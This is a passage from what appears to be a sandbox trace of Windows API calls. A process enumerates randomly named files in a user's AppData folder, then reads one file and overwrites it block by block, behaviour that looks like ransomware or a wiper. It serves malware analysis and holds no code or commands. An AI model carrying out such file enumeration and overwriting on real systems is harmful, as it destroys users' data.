ftLastAccessTime.dwLowDateTime=0xb152f8c0, ftLastAccessTime.dwHighDateTime=0x1d9705b, ftLastWriteTime.dwLowDateTime=0xb152f8c0, ftLastWriteTime.dwHighDateTime=0x1d9705b, nFileSizeHigh=0x0, nFileSizeLow=0x12bd4, dwReserved0=0x0, dwReserved1=0x0, cFileName="0kv--h785b9BKHr7X8.mkv", cAlternateFileName="0KV--H~1.MKV")) returned 1 [0090.145] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x45e0b60, ftCreationTime.dwHighDateTime=0x1d9753c, ftLastAccessTime.dwLowDateTime=0x746b5210, ftLastAccessTime.dwHighDateTime=0x1d975ae, ftLastWriteTime.dwLowDateTime=0x746b5210, ftLastWriteTime.dwHighDateTime=0x1d975ae, nFileSizeHigh=0x0, nFileSizeLow=0x1555b, dwReserved0=0x0, dwReserved1=0x0, cFileName="2cvjqDL8AbrH.rtf", cAlternateFileName="2CVJQD~1.RTF")) returned 1 [0090.145] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe439c690, ftCreationTime.dwHighDateTime=0x1d97134, ftLastAccessTime.dwLowDateTime=0x259485f0, ftLastAccessTime.dwHighDateTime=0x1d973d1, ftLastWriteTime.dwLowDateTime=0x259485f0, ftLastWriteTime.dwHighDateTime=0x1d973d1, nFileSizeHigh=0x0, nFileSizeLow=0x13f6f, dwReserved0=0x0, dwReserved1=0x0, cFileName="2XrQR lLdHFDJW8qX.jpg", cAlternateFileName="2XRQRL~1.JPG")) returned 1 [0090.145] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe5278740, ftCreationTime.dwHighDateTime=0x1d96847, ftLastAccessTime.dwLowDateTime=0x49b29620, ftLastAccessTime.dwHighDateTime=0x1d96c7e, ftLastWriteTime.dwLowDateTime=0x49b29620, ftLastWriteTime.dwHighDateTime=0x1d96c7e, nFileSizeHigh=0x0, nFileSizeLow=0x3b8a, dwReserved0=0x0, dwReserved1=0x0, cFileName="7ord0oMkDdqdZwcFM7PM.mkv", cAlternateFileName="7ORD0O~1.MKV")) returned 1 [0090.145] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a40bb0, ftCreationTime.dwHighDateTime=0x1d966d8, ftLastAccessTime.dwLowDateTime=0xe2e64df0, ftLastAccessTime.dwHighDateTime=0x1d96b75, ftLastWriteTime.dwLowDateTime=0xe2e64df0, ftLastWriteTime.dwHighDateTime=0x1d96b75, nFileSizeHigh=0x0, nFileSizeLow=0x1453f, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcoFPdLUL2Wyq3ljkzb.jpg", cAlternateFileName="ACOFPD~1.JPG")) returned 1 [0090.145] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc3abec40, ftCreationTime.dwHighDateTime=0x1d96663, ftLastAccessTime.dwLowDateTime=0xe45c7b40, ftLastAccessTime.dwHighDateTime=0x1d96a59, ftLastWriteTime.dwLowDateTime=0xe45c7b40, ftLastWriteTime.dwHighDateTime=0x1d96a59, nFileSizeHigh=0x0, nFileSizeLow=0xcd9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="bNR8T.csv", cAlternateFileName="")) returned 1 [0090.145] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7d1a3db0, ftCreationTime.dwHighDateTime=0x1d97660, ftLastAccessTime.dwLowDateTime=0x3aacbce0, ftLastAccessTime.dwHighDateTime=0x1d97684, ftLastWriteTime.dwLowDateTime=0x3aacbce0, ftLastWriteTime.dwHighDateTime=0x1d97684, nFileSizeHigh=0x0, nFileSizeLow=0x7b1b, dwReserved0=0x0, dwReserved1=0x0, cFileName="EGL9Rx1KXSqWh.mkv", cAlternateFileName="EGL9RX~1.MKV")) returned 1 [0090.145] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6219390, ftCreationTime.dwHighDateTime=0x1d975e1, ftLastAccessTime.dwLowDateTime=0x40ed0d40, ftLastAccessTime.dwHighDateTime=0x1d975e8, ftLastWriteTime.dwLowDateTime=0x40ed0d40, ftLastWriteTime.dwHighDateTime=0x1d975e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ded, dwReserved0=0x0, dwReserved1=0x0, cFileName="gV-dKx26kEi.pdf", cAlternateFileName="GV-DKX~1.PDF")) returned 1 [0090.145] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x9b8c57d0, ftCreationTime.dwHighDateTime=0x1d97497, ftLastAccessTime.dwLowDateTime=0x13ee9c00, ftLastAccessTime.dwHighDateTime=0x1d97548, ftLastWriteTime.dwLowDateTime=0x13ee9c00, ftLastWriteTime.dwHighDateTime=0x1d97548, nFileSizeHigh=0x0, nFileSizeLow=0x12fb7, dwReserved0=0x0, dwReserved1=0x0, cFileName="I4JmLhoyXMGmJxztkf.wav", cAlternateFileName="I4JMLH~1.WAV")) returned 1 [0090.146] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0090.146] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6490b000, ftCreationTime.dwHighDateTime=0x1d97569, ftLastAccessTime.dwLowDateTime=0x53d8b4f0, ftLastAccessTime.dwHighDateTime=0x1d975e2, ftLastWriteTime.dwLowDateTime=0x53d8b4f0, ftLastWriteTime.dwHighDateTime=0x1d975e2, nFileSizeHigh=0x0, nFileSizeLow=0xfe56, dwReserved0=0x0, dwReserved1=0x0, cFileName="Im_qpwMGCe7SuRoN0aBx.m4a", cAlternateFileName="IM_QPW~1.M4A")) returned 1 [0090.146] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf3c8c540, ftCreationTime.dwHighDateTime=0x1d96bc9, ftLastAccessTime.dwLowDateTime=0x3f0789c0, ftLastAccessTime.dwHighDateTime=0x1d97119, ftLastWriteTime.dwLowDateTime=0x3f0789c0, ftLastWriteTime.dwHighDateTime=0x1d97119, nFileSizeHigh=0x0, nFileSizeLow=0x152b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="JhfS93kCXhB0dS47UXO.swf", cAlternateFileName="JHFS93~1.SWF")) returned 1 [0090.146] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8b07e7b0, ftCreationTime.dwHighDateTime=0x1d96df0, ftLastAccessTime.dwLowDateTime=0x2eaf0d00, ftLastAccessTime.dwHighDateTime=0x1d97204, ftLastWriteTime.dwLowDateTime=0x2eaf0d00, ftLastWriteTime.dwHighDateTime=0x1d97204, nFileSizeHigh=0x0, nFileSizeLow=0xa39e, dwReserved0=0x0, dwReserved1=0x0, cFileName="JPY6Y vdnrHDp.mp3", cAlternateFileName="JPY6YV~1.MP3")) returned 1 [0090.146] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe55f0720, ftCreationTime.dwHighDateTime=0x1d9736d, ftLastAccessTime.dwLowDateTime=0xaad61ba0, ftLastAccessTime.dwHighDateTime=0x1d974c8, ftLastWriteTime.dwLowDateTime=0xaad61ba0, ftLastWriteTime.dwHighDateTime=0x1d974c8, nFileSizeHigh=0x0, nFileSizeLow=0x73fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="kz1HaTIACtkD69pq32M.m4a", cAlternateFileName="KZ1HAT~1.M4A")) returned 1 [0090.146] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x112bcfa0, ftCreationTime.dwHighDateTime=0x1d96eff, ftLastAccessTime.dwLowDateTime=0x6e2e85a0, ftLastAccessTime.dwHighDateTime=0x1d9701f, ftLastWriteTime.dwLowDateTime=0x6e2e85a0, ftLastWriteTime.dwHighDateTime=0x1d9701f, nFileSizeHigh=0x0, nFileSizeLow=0x15944, dwReserved0=0x0, dwReserved1=0x0, cFileName="lKBIj-DLGhLH.m4a", cAlternateFileName="LKBIJ-~1.M4A")) returned 1 [0090.146] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0090.146] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43607cb0, ftCreationTime.dwHighDateTime=0x1d970a2, ftLastAccessTime.dwLowDateTime=0xa419cf40, ftLastAccessTime.dwHighDateTime=0x1d97479, ftLastWriteTime.dwLowDateTime=0xa419cf40, ftLastWriteTime.dwHighDateTime=0x1d97479, nFileSizeHigh=0x0, nFileSizeLow=0x1810c, dwReserved0=0x0, dwReserved1=0x0, cFileName="NbYVLogs.m4a", cAlternateFileName="")) returned 1 [0090.146] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe08ef420, ftCreationTime.dwHighDateTime=0x1d96f1d, ftLastAccessTime.dwLowDateTime=0x9c844920, ftLastAccessTime.dwHighDateTime=0x1d972e6, ftLastWriteTime.dwLowDateTime=0x9c844920, ftLastWriteTime.dwHighDateTime=0x1d972e6, nFileSizeHigh=0x0, nFileSizeLow=0x29be, dwReserved0=0x0, dwReserved1=0x0, cFileName="N_rlN0Z3nRhZqdxj JZI.rtf", cAlternateFileName="N_RLN0~1.RTF")) returned 1 [0090.146] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab045dc0, ftCreationTime.dwHighDateTime=0x1d96fc9, ftLastAccessTime.dwLowDateTime=0x334e8d50, ftLastAccessTime.dwHighDateTime=0x1d97497, ftLastWriteTime.dwLowDateTime=0x334e8d50, ftLastWriteTime.dwHighDateTime=0x1d97497, nFileSizeHigh=0x0, nFileSizeLow=0xc06e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ObWS3XW5aMy2t2Z9HK.wav", cAlternateFileName="OBWS3X~1.WAV")) returned 1 [0090.146] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4b7ed130, ftCreationTime.dwHighDateTime=0x1d96cab, ftLastAccessTime.dwLowDateTime=0x55987f50, ftLastAccessTime.dwHighDateTime=0x1d96d7c, ftLastWriteTime.dwLowDateTime=0x55987f50, ftLastWriteTime.dwHighDateTime=0x1d96d7c, nFileSizeHigh=0x0, nFileSizeLow=0x35dc, dwReserved0=0x0, dwReserved1=0x0, cFileName="PpTfQfUJeEHeOaQm.bmp", cAlternateFileName="PPTFQF~1.BMP")) returned 1 [0090.147] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfa540c80, ftCreationTime.dwHighDateTime=0x1d9722c, ftLastAccessTime.dwLowDateTime=0xd845e210, ftLastAccessTime.dwHighDateTime=0x1d97404, ftLastWriteTime.dwLowDateTime=0xd845e210, ftLastWriteTime.dwHighDateTime=0x1d97404, nFileSizeHigh=0x0, nFileSizeLow=0x7841, dwReserved0=0x0, dwReserved1=0x0, cFileName="pPz0ItX4f1x.avi", cAlternateFileName="PPZ0IT~1.AVI")) returned 1 [0090.147] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1c7d7730, ftCreationTime.dwHighDateTime=0x1d972b2, ftLastAccessTime.dwLowDateTime=0xf5008f20, ftLastAccessTime.dwHighDateTime=0x1d97523, ftLastWriteTime.dwLowDateTime=0xf5008f20, ftLastWriteTime.dwHighDateTime=0x1d97523, nFileSizeHigh=0x0, nFileSizeLow=0x1603c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUZ1Gae4SGu.mp3", cAlternateFileName="PUZ1GA~1.MP3")) returned 1 [0090.147] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x324af9c0, ftCreationTime.dwHighDateTime=0x1d97307, ftLastAccessTime.dwLowDateTime=0xd4993220, ftLastAccessTime.dwHighDateTime=0x1d97422, ftLastWriteTime.dwLowDateTime=0xd4993220, ftLastWriteTime.dwHighDateTime=0x1d97422, nFileSizeHigh=0x0, nFileSizeLow=0x6424, dwReserved0=0x0, dwReserved1=0x0, cFileName="rKqcydSq.mkv", cAlternateFileName="")) returned 1 [0090.147] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c9e6ed0, ftCreationTime.dwHighDateTime=0x1d9683a, ftLastAccessTime.dwLowDateTime=0xe10b9eb0, ftLastAccessTime.dwHighDateTime=0x1d968fd, ftLastWriteTime.dwLowDateTime=0xe10b9eb0, ftLastWriteTime.dwHighDateTime=0x1d968fd, nFileSizeHigh=0x0, nFileSizeLow=0xa6b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="s8ZDF Lucr_Z28Spu.swf", cAlternateFileName="S8ZDFL~1.SWF")) returned 1 [0090.147] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x48803cc0, ftCreationTime.dwHighDateTime=0x1d8c103, ftLastAccessTime.dwLowDateTime=0x48803cc0, ftLastAccessTime.dwHighDateTime=0x1d8c103, ftLastWriteTime.dwLowDateTime=0x48803cc0, ftLastWriteTime.dwHighDateTime=0x1d8c103, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0090.147] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74412c80, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x74412c80, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x9ead0300, ftLastWriteTime.dwHighDateTime=0x1d98983, nFileSizeHigh=0x0, nFileSizeLow=0x10d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="svchost.exe", cAlternateFileName="")) returned 1 [0090.147] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xdcc414f0, ftCreationTime.dwHighDateTime=0x1d96d66, ftLastAccessTime.dwLowDateTime=0x84ce7f10, ftLastAccessTime.dwHighDateTime=0x1d97635, ftLastWriteTime.dwLowDateTime=0x84ce7f10, ftLastWriteTime.dwHighDateTime=0x1d97635, nFileSizeHigh=0x0, nFileSizeLow=0xe12e, dwReserved0=0x0, dwReserved1=0x0, cFileName="t2oMmxPi.flv", cAlternateFileName="")) returned 1 [0090.147] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb00a9e30, ftCreationTime.dwHighDateTime=0x1d975d5, ftLastAccessTime.dwLowDateTime=0x470975e0, ftLastAccessTime.dwHighDateTime=0x1d97694, ftLastWriteTime.dwLowDateTime=0x470975e0, ftLastWriteTime.dwHighDateTime=0x1d97694, nFileSizeHigh=0x0, nFileSizeLow=0x13507, dwReserved0=0x0, dwReserved1=0x0, cFileName="te-nH.flv", cAlternateFileName="")) returned 1 [0090.147] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x580760, ftCreationTime.dwHighDateTime=0x1d968a2, ftLastAccessTime.dwLowDateTime=0xcd70dc50, ftLastAccessTime.dwHighDateTime=0x1d96c66, ftLastWriteTime.dwLowDateTime=0xcd70dc50, ftLastWriteTime.dwHighDateTime=0x1d96c66, nFileSizeHigh=0x0, nFileSizeLow=0x7b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="UK0_T4zjWaC.wav", cAlternateFileName="UK0_T4~1.WAV")) returned 1 [0090.148] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2a905870, ftCreationTime.dwHighDateTime=0x1d96a6e, ftLastAccessTime.dwLowDateTime=0xe2a8e0, ftLastAccessTime.dwHighDateTime=0x1d96fad, ftLastWriteTime.dwLowDateTime=0xe2a8e0, ftLastWriteTime.dwHighDateTime=0x1d96fad, nFileSizeHigh=0x0, nFileSizeLow=0xb3da, dwReserved0=0x0, dwReserved1=0x0, cFileName="vaZJJgsh9Q1-hrf7S7.avi", cAlternateFileName="VAZJJG~1.AVI")) returned 1 [0090.148] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf4463a60, ftCreationTime.dwHighDateTime=0x1d9672e, ftLastAccessTime.dwLowDateTime=0x7fff2d40, ftLastAccessTime.dwHighDateTime=0x1d9674e, ftLastWriteTime.dwLowDateTime=0x7fff2d40, ftLastWriteTime.dwHighDateTime=0x1d9674e, nFileSizeHigh=0x0, nFileSizeLow=0xd356, dwReserved0=0x0, dwReserved1=0x0, cFileName="vCNVmrhf2U7XXJBaxRmB.pps", cAlternateFileName="VCNVMR~1.PPS")) returned 1 [0090.148] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc0c85ce0, ftCreationTime.dwHighDateTime=0x1d968eb, ftLastAccessTime.dwLowDateTime=0x9134c250, ftLastAccessTime.dwHighDateTime=0x1d96bef, ftLastWriteTime.dwLowDateTime=0x9134c250, ftLastWriteTime.dwHighDateTime=0x1d96bef, nFileSizeHigh=0x0, nFileSizeLow=0xe2f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="w1qxUxlTv5acD7ekU7.mkv", cAlternateFileName="W1QXUX~1.MKV")) returned 1 [0090.148] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc0090960, ftCreationTime.dwHighDateTime=0x1d97671, ftLastAccessTime.dwLowDateTime=0x18e72e90, ftLastAccessTime.dwHighDateTime=0x1d97677, ftLastWriteTime.dwLowDateTime=0x18e72e90, ftLastWriteTime.dwHighDateTime=0x1d97677, nFileSizeHigh=0x0, nFileSizeLow=0x15648, dwReserved0=0x0, dwReserved1=0x0, cFileName="wY-iL 75UNFS8BKTR.wav", cAlternateFileName="WY-IL7~1.WAV")) returned 1 [0090.148] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7ad4b00, ftCreationTime.dwHighDateTime=0x1d967d6, ftLastAccessTime.dwLowDateTime=0x10434c10, ftLastAccessTime.dwHighDateTime=0x1d96d99, ftLastWriteTime.dwLowDateTime=0x10434c10, ftLastWriteTime.dwHighDateTime=0x1d96d99, nFileSizeHigh=0x0, nFileSizeLow=0x13f7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="z2r-DGhdhEVsMRYoTz.mp3", cAlternateFileName="Z2R-DG~1.MP3")) returned 1 [0090.148] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0090.148] FindClose (in: hFindFile=0xd8a310 | out: hFindFile=0xd8a310) returned 1 [0090.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0090.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0090.149] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0kv--h785b9BKHr7X8.mkv", dwFileAttributes=0x80) returned 1 [0090.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0090.149] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0kv--h785b9BKHr7X8.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\0kv--h785b9bkhr7x8.mkv"), fInfoLevelId=0x0, lpFileInformation=0x25035b8 | out: lpFileInformation=0x25035b8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1f5de560, ftCreationTime.dwHighDateTime=0x1d96b60, ftLastAccessTime.dwLowDateTime=0xb152f8c0, ftLastAccessTime.dwHighDateTime=0x1d9705b, ftLastWriteTime.dwLowDateTime=0xb152f8c0, ftLastWriteTime.dwHighDateTime=0x1d9705b, nFileSizeHigh=0x0, nFileSizeLow=0x12bd4)) returned 1 [0090.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0090.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0090.150] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0kv--h785b9BKHr7X8.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\0kv--h785b9bkhr7x8.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0090.150] GetFileType (hFile=0x250) returned 0x1 [0090.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0090.150] GetFileType (hFile=0x250) returned 0x1 [0090.150] GetFileSize (in: hFile=0x250, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x12bd4 [0090.151] ReadFile (in: hFile=0x250, lpBuffer=0x2503850, nNumberOfBytesToRead=0x12bd4, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x2503850*, lpNumberOfBytesRead=0x23eb38*=0x12bd4, lpOverlapped=0x0) returned 1 [0090.152] CloseHandle (hObject=0x250) returned 1 [0090.203] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0kv--h785b9BKHr7X8.mkv", nBufferLength=0x105, lpBuffer=0x23e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0kv--h785b9BKHr7X8.mkv", lpFilePart=0x0) returned 0x39 [0090.203] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0090.203] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\0kv--h785b9BKHr7X8.mkv" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\0kv--h785b9bkhr7x8.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0090.205] GetFileType (hFile=0x250) returned 0x1 [0090.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0090.205] GetFileType (hFile=0x250) returned 0x1 [0090.206] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.207] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.207] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.208] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.208] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.208] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.209] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.209] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.209] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.210] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x23ed0e0*, lpNumberOfBytesWritten=0x23ea98*=0x1000, lpOverlapped=0x0) returned 1 [0090.210] WriteFile (in: hFile=0x250, lpBuffer=0x23ed0e0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23ea98, 